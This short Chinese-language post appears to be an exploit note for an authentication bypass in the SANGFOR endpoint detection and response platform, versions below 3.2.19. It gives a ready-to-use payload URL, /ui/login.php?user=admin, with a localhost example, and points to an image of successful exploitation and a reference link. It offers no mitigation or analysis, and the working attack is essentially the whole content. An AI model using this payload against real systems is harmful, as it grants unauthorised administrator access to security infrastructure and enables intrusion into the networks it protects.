某信服-SANGFOR终端检测响应平台 - 任意用户登录 0day

影响范围

平台版本号:< 3.2.19

0x02 漏洞利用

payload: https://ip/ui/login.php\?user=admin

例如: https://127.0.0.1:5000/ui/login.php\?user=admin

成功利用

image-20200820093619309

参考文章:

https://www.yuque.com/pmiaowu/hcy2bz/fp4icw\?from=groupmessage